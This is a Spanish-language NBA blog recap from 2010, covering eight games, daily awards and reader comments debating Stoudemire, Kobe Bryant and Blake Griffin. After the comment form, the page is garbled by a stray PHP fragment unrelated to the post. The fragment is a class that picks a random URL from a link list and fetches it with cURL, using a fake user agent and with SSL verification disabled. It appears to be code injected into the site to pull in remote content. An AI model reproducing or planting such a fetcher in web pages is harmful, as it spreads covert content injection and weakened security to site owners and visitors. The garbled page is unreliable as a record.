La Crónica (28/10/2010)

29 de November de 2010 por telekoman

Hasta un total de 8 partidos hoy, muchos de ellos muy interesantes, varios de ellos con sorpresas.

Empezaremos por el duelo de gallitos del Oeste. Los Hornets dominaron a placer a los Spurs durante la primera parte del partido, llegando al descanso con 17 puntos de ventaja. Chris Paul marcaba cómodamente el ritmo del encuentro, se comía literalemente a Tony Parker y encontraba con muchísima facilidad a David West que terminaba con 14 puntos. Hasta aquí todo un sueño para los de New Orleans. Desde aquí toda una pesadilla. San Antonio reaccionaba de la mano de Ginobili, Duncan y Jefferson y le endosaba nada menos que 65 puntos a su rival en la segunda parte para terminar con un cómodo 109-95. El argentino dando un clinic de tiro, penetración y asistencias y Duncan enseñando a su pupilo Splitter como se juega al poste. Como ya decíamos días atras, los de Chris Paul parecen algo blandos, característica que los de Popovich parecen haber borrado de su diccionario (109-95).

Seguimos con el Oeste, esta vez con la orgía anotadora que se vivió en Denver. Los Nuggets ganaron de manera muy apretada a los Suns por nada más y nada menos que 133-138. Y eso que el tirador mayor del reino, Carmelo Anthony, se tuvo que sentar en el banco a los 2 minutos de empezar el choque por sentirse mal y ya no volvió a salir a jugar. Su puesto lo ocupó un JR Smith que aprovechó su oportunidad estupéndamente, con 30 puntos y 8 rebotes. Billups y Ty Lawson dirigieron bien a su equipo, e incluso anotaron con cierta facilidad. En las huestes de Phoenix sobresalió Jason Richardson que se fue hasta los 39 puntos y 10 rebotes con 7 triples de 10 intentos. Por supuesto también destacó Nash que anotó su triple 1500 en la NBA en los minutos más calientes del partido.

Y ahora una de las sorpresas de la jornada (¿o no?). Indiana hizo otra muesca en su revólver e incrementa su fama de mata-gigantes en esta temporada ganando a Los Lakers en el Staples por 95-92. Con Kobe tirándose hasta las zapatillas (alguna de ellas con hasta 4 tíos encima) y consiguiendo 41 puntos y tan sólo Odom y Gasol por encima de 10 puntos es difícil llevarse un partido trabado. Van a perdonar a este humilde bloggero que no ha visto el partido entero, y a lo mejor viene alguien que sí lo ha visto y me pinta la cara, pero teniendo en cuenta las posibilidades ofensivas que tiene este equipo, no entiendo cómo puede producirse una situación como ésta. Enfrente unos Pacers muy ordenados y aguerridos en defensa donde destacó Hibbert con 24 puntos y 12 rebotes amargando la noche a un Gasol desacertado.

Vamos algo más rápidos en el resto de encuentros. Los Thunder perdieron sólo de un sólo punto (98-99) en Houston pese a tener el último tiro. Durant falló en el último segundo un tiro forzadísimo por la buena defensa de Battier. No fuéeun buen partido de  un Durant algo desacertado en el tiro siendo el mejor Westbrook que firmó un doble-doble con 23 puntos y 10 asistencias. En los Rockets, Kevin Martin y Shane Battier acapararon todos los focos. En New Jersey los Nets remontaron en el último cuarto frente a Portland para llevarse el partido por 96-98. Devin Harris hizo y deshizo a su antojo en la parte final del partido mientras que Roy, Aldridge y Matthews fueron los único que vieron el aro con facilidad en el equipo contrario. Toronto recibió una cura de humildad bastante importante de manos de Atlanta (96-78). Los Hawks desplegaron un juego interesante y variado con hasta 5 jugadores por encima de 10 puntos, destacando el triple-doble de Josh Smith. Nada ni nadie que destacar en Toronto. Por su parte, Detroit hizo sudar tinta a los Knicks siendo necesarias dos prorrogas (125-116). Partidazo de Amare con 37 puntos y 15 rebotes muy bien secundado del resto del quinteto titular (el banquillo no sabemos si estaba), mientras que por los Pistons Prince y Stuckey llevaron el peso ofensivo. En el último partido Utah se deshizo con facilidad de los Clippers por 109-97 pese al esfuerzo diario de Griffin (35 puntos, 14 rebotes y 7 asistencias). El chaval tiene que estar desesperado).

PREMIOS

MVP: Grandes actuaciones en el día de hoy. Manu Ginobili, Deron Williams o Roy Hibbert serían más que dignos candidatos al premio, pero se quedan algo cortos frente al triple-doble de Josh Smith (12 puntos, 13 rebotes y 10 asistencias) , los 30 puntos y 8 rebotes de JR Smith y sobre todo los 37 puntos, 15 rebotes y 7 asistencias de Amare Stoudemire. El premio para él.

Rookie: Qué podemos decir que no hayamos dicho ya antes. La actuación de Blake Griffin es prácticamente igual que la que nos ha hecho dar el premio de MVP de hoy a Amare. Con eso queda dicho todo. 35 puntos, 14 rebotes y 7 asistencias para el animalito. Los otros rookies de los Clippers tampoco han desentonado. Y ojito a este equipo como pesque algo interesante en el Draft de este año.

Sorpresa: Para mí, que Raymond Felton se convierta en un base regular es una de las grandes sorpresas no sólo del día, si no de toda la temporada. Buen partido hoy con 23 puntos y 11 asistencias frente a mis Pistons

Decepción: Como ya he comentado en la crónica, me parece algo decepcionante el juego de los Lakers. No me gusta el Kobe-sistema, igual que no me gusta el Lebron-sistema o el Roy-sistema, por mucho que las actuaciones individuales sean impresionantes. Si por algo me gusta el baloncesto es por ser un juego de equipo de verdad.

Esfuerzo en vano: Ya hemos comentado el esfuerzo en vano diario de Griffin. Hoy el de Kobe no se queda atrás y tampoco el de Jason Richardson con 39 puntos y 10 rebotes.

Comenta

18 comentarios a esta entrada

  1. scriers dice:
    #1

    Para los que dudaban de Stout, está haciendo unos sensacionales números. A mí siempre me ha gustado su conocimiento del pick and roll y como se mueve para que le doblen balones. Fijaros en sus movimientos en los partidos, no para de hacer movimientos inteligentes. Vale, que casi siempre son para él finalizar, pero quién diga que solo es un saltarín y demás como he escuchado por ahí, está muy equivocado. Por su parte, Felton está a un nivel altísimo (18-4-8), pero a Rudy por menos de un 3/11 se le ha crucificado.

    Por lo demás, Ginobilli está ganando el pulso a Parker, lo digo por el debate del otro día, Griffin sigue haciendo de las suyas y los Lakers están sufriendo el cansancio de Gasol y el Kobe sistema que suele darse cuando la cosa va peor. Les sugeriría repasar el principio de temporada, todos al carro mucho mejor. Y a Durant tanto elogio le ha gripado el tiro, lleva % malos esta temporada.

      Citar

  2. scriers dice:
    #2

    Por cierto, vaya partido de Ibaka, que le va a comer la titularidad en la selección a Marc Gasol en poco tiempo si las circunstancias lo permiten.

      Citar

  3. TheDeerHunter dice:
    #3

    Recojo el guante lanzado por Scriers acerca de Stat… Es innegable que está haciendo números impresionantes. Los lleva haciendo toda su carrera y reconozco que estaba convencido que iba a sufrir sin Nash.
    Se trata de un jugador que me parecía una bestia parda antes de la grave lesión en el 2005… cuando volvió lo hizo registrando iguales o mejores números que antes de su lesión, pero me dá que el efecto real de tales números había descendido sobre todo en términos defensivos. Creo que su actitud cambió para siempre.
    Yo lo que le achaco no es que sea un saltarín. Le reprocho que sea un “hacenúmeros” y un pasota defensivamente. De todas formas ya te aviso que le he visto muy poco en directo este año… igual ha cambiado. De hecho lleva más tapones que nunca…
    De todas formas… para lo que está haciendo 16 kilos no me parece tan exagerado como me parecía cuando le firmaron. Veremos cómo sigue si por una de esas llega Melo al equipo.

    Y sí, Parker ha bajado sus prestaciones en beneficio de Manudo. Ahora mismo hay poco debate que valga.

      Citar

  4. nacho dice:
    #4

    Sí, Scriers, Stat es bueno, no lo dudo. Pero yo estoy más de acuerdo con Deer, y además una fuerza de la naturaleza, pero juega con otra ventaja necesita cuatro pasos para llegar al aro tras el pick,y se lo permiten, cosa que no hacen con otros jugadores.
    Por cierto, ¿lo de Gasol es que empieza a notar el cansancio, o algo pasajero?
    Se me disuelven los Hornets, y me jode, porque son simpáticos y equipo.

      Citar

  5. Viva_Dirk dice:
    #5

    Los Hornets no se disuelven, pero ante una escabechina como la que les montó ayer Popovich no tuvieron nada que hacer, fue una clase del maestro al alumno, tras la primera parte con West destrozando al equipo y problemas con el balance defensivo, quitó a Blair para poner a G.Hill y jugar con Jefferson de 4, la defensa por delante a West y las ayudas fueron perfectas, y el balance con 4 pequeños fue mucho mejor. Vamos que la 2ª parte la controló San Antonio a base de táctica, y ahí de momento los Hornets no pueden compararse son ellos.

      Citar

  6. scriers dice:
    #6

    Ojo, que no he dicho en ningún momento que aquí se hable de él así, he dicho que se habla de Stat así, en general y en . Y a mí me parece injusto. Creo que él ha ocupado y bien el hueco de David Lee y que además está muy implicado (normal, por otra parte, con todo esos millones al año). De todas formas, otros firmaron tajadas similares y cayeron a las primeras de cambio. Hay una tendencia habitual a despreciar a los físicos atléticos, como si solo fueran eso. Ya quisiera, por ejemplo, Marc Gasol, hacer esa lectura del Pick And Roll y tener el juego de pies que tiene Stat, y tampoco desprecio al menor de los Gasol que tiene otras cualidades. Pero es que muchas veces se cae en el menosprecio casi primitivo.

      Citar

  7. HisRoyalAirness dice:
    #7

    Lo de Blake Griffin está fuera de toda normalidad. Lo que más me sorprende es que no está haciendo estos números porque quiera hacerse un nombre, pelea cada rebote como el que más, tiene unos porcentajes cojonudos y además asiste. Si las lesiones le respetan creo que hay all-star para rato y, como dicen por ahì, si pescan algo en el draft o consiguen un buen trade con davis ojito a los Clippers.
    En dìas como hoy mi admiración por Kobe se desmorona. Me indigna su número de tiros. Pero aún con este bajón Lakers se van a pasear.

      Citar

  8. Txusma dice:
    #8

    Yo lo que ponía en duda es:
    Que vale más un Amare por 100 kilos en 5 años o un David Lee que cobra 80 por 6?

      Citar

  9. Jona dice:
    #9

    A mi lo que me preocupa de Stat es la cantidad de 3 segundos en la zona que le pitan es para que se lo mire en serio

      Citar

  10. Denise dice:
    #10

    Mirando las estadísticas comprobarás que Amare lo está haciendo bastante bien en NY, mucho mejor de lo que podía imaginarse, si ves sus partidos comprobarás que en algunos se sale y te gana el partido el solito, pero en otros se dedica a engordar estadísticas. Eso sí, lo prefiero antes que a Lee, y he de reconocer que antes de su grave lesión era cojonudamente bueno y era una alegría verlo en aquellos Suns.
    Si Kobe empieza a olvidarse del resto y a tirarse más de 25 por noche, los Lakers empezarán a perder partidos que deberían de haber ganado con relativa comodidad, como el de anoche. Que sea el mejor, no debería significar el tener licencia para tirarse lo que le de la gana, y más aún estando desacertado y teniendo al lado compañeros de gran calidad y totalmente solos y mejor posicionados para tirar. VILMA!!!!!!

      Citar

  11. MagicJohnson32 dice:
    #11

    Anoche el problema no fueron los tiros de Kobe, que sostuvo al equipo en un día nefasto y estuvo a punto de ganar el partido. El equipo pareció cansado, tal vez relajado. En el caso de Gasol, anoche se vio completamente superado por Hibbert (en días como éste es cuando se echa realmente de menos a Bynum) y ha reconocido que está fatigado.

      Citar

  12. Vader dice:
    #12

    Bueno aprovecho para comentar varios temas que hace dias que no escribo y ya tenia ganas;

    – Lo de Griffin es bestial. Si hace esto su primer año no quiero ni imaginar lo que puede ser este jugador si tiene la suerte de esquivar las lesiones. ¿Futuro All-star? Yo le veo que un posible futuro MVP si los Clippers consiguen montar un equipo decente a su alrededor. Esta haciendo más de 20-10 con una facilidad increible y ademas es un jugador muy plástico que da gusto ver jugar. Lo único que me sabe mal es que haya caido en los Clippers… ¿Será el profeta que acabará con la maldición de esta franquicia?

    – Kobe de vez en cuando se juega más balones de los que deberia pero como escribio alguien por aquí mejor eso que lo contrario… El otro dia ante los Jazz casi se carga el partido el solito metiendo 14 puntos seguidos en el último cuarto. Los Jazz se creian que Jordan habia vuelto y que estaban de vuelta en el Delta Center. Por unos minutos dio mucho meido…

    – Y sobre mis Knicks pues la verdad soy mucho más optimista hoy que al inicio de la temporada. Personalmente estaba contento con el equipo que se habia hecho. Por fin teniamos un jugador franquicia, por fin teniamos una amenaza interior, por fin teniamos un base y por fin habia llegado el año en que se habian hecho fichajes y traspasos pensando en ganar partidos y no sólo el liberar espacio salarial. Pero a dia de hoy aún estoy más ilusionado porque Stats esta jugando a gran nivel, taponando más que nunca, Landry Fields tiene una pinta estupenda y a Felton le esta sentando muy bien cambiar los sistemas de Brown por los de Dantoni. Ya sólo nos falta convencer a Carmelo para que venga para volver a la elite de la liga o coger a los Chandler, Gallianari, Douglas, etc… + expiring de Curry y montar algun trade que nos de algun All-star para seguir creciendo.

    Saludos

      Citar

  13. Denise dice:
    #13

    Si Kobe involucrase más a sus compañeros y no les pasara la pelota cuando tiene 3 tios encima en vez de tirar, quizás el resultado hubiese sido otro. En la mayoría de encuentros es el salvador, pero hay unos cuantos partidos al año en los cuales el principal responsable de la derrota es su egoista selección de tiro.
    100% de acuerdo con Griffin, quizás es pronto para decirlo, pero va camino de estar a la altura de Duncan o Garnett. El rookie del año va a ser suyo sin discusión.

      Citar

  14. Tobal dice:
    #14

    La gran sorpresa sin duda,es la victoria de los Indiana Pacers,en cancha de los Lakers,están en buena forma estos Pacers,que ganaron hace poco a los Heat y que ahora mismo están en puestos de play offs,cuando muchos no daban un duro por ellos,me alegro que esta franquicia vuelva a ser ganadora,como siempre ha sido.

      Citar

  15. Denise dice:
    #15

    No te engañes, los Pacers están en playoffs porque el nivel del Este es pésimo. En el Oeste no se comerían un colín. Eso sí, tienen mucho mejor equipo que años anteriores, desde la retirada de Reggie Miller diría yo. Y lo mejor para ellos es que tienen muuuucho futuro, con Hibbert que va a ser un crack, y con todo el margen salarial que tienen de cara al año que viene para fichar agentes libres, que yo recuerde, entre los pufos de Dunleavy, TJ Ford y Foster dejan libres 24 millones. De los 3 que he nombrado, sólo renovaría a Dunleavy pero no por más de 4 kilos.

      Citar

  16. sr. Lagarto dice:
    #16

    Estoy convencido de que David Lee está infravalorado por muchos de vosotros. No quiero ni pensar si en los Lakers echasen a Bynum a la puta calle y jugasen Gasol de 4 y Lee de 5. Eso sí que daría miedito y no lo de ahora.
    Un saludo.
    Lagarto.

      Citar

  17. Scriers dice:
    #17

    Pues yo no estoy muy de acuerdo. Creo que bynum se complementa mejor que lo que pudiera hacerlo Lee con Gasol. es cuestión de estilos. y sin infravalorar a Lee, Bynum hace un trabajo mas complementario.

      Citar

  18. MagicJohnson32 dice:
    #18

    La temporada pasada Kobe hizo 8 partidos de +40 puntos, de los que los Lakers ganaron 7.

    En Playoffs, Kobe ha superado los 40 puntos 10 veces, de las cuales los Lakers ganaron 9.

    Por supuesto que hay ocasiones en las que lanza demasiado, pero en serio, el rendimiento de casi todo el equipo en Utah y contra Indiana ha sido penoso, y los puntos de Bryant fueron el único argumento que mantuvo a los Lakers con vida en ambos casos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>